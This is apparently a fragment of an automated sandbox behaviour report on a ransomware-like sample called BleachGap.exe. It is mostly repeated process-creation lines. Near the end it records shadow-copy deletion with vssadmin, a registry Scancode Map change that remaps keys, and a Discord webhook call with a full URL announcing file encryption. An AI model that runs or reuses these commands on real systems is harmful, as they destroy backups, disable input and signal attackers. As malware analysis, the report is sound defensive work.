Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior

Source: unknown	Process created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layout' /v 'Scancode Map' /t REG_BINARY /d '00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000' /f /reg:64
Source: unknown	Process created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layout' /v 'Scancode Map' /t REG_BINARY /d '00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000' /f /reg:64
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe 'C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook' -m ':writing_hand: Currently encrypting files... Please wait until the password and fake btc acc are sended' -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layout' /v 'Scancode Map' /t REG_BINARY /d '00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000' /f /reg:64	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layout' /v 'Scancode Map' /t REG_BINARY /d '00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000' /f /reg:64	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe 'C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook' -m ':writing_hand: Currently encrypting files... Please wait until the password and fake btc acc are sended' -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe

34_2_001981F7

Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe

Code function: 34_2_001A4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

34_2_001A4C03

Source: DiscordSendWebhook.exe, 00000022.00000000.247368021.00000000001F5000.00000002.00020000.sdmp, DiscordSendWebhook.exe.0.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: BleachGap.exe, 00000000.00000002.549652060.0000000000FF0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: BleachGap.exe, 00000000.00000002.549652060.0000000000FF0000.00000002.00000001.sdmp, DiscordSendWebhook.exe	Binary or memory string: Shell_TrayWnd
Source: BleachGap.exe, 00000000.00000002.549652060.0000000000FF0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: BleachGap.exe, 00000000.00000002.549652060.0000000000FF0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe

Code function: 34_2_0016886B cpuid

34_2_0016886B

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
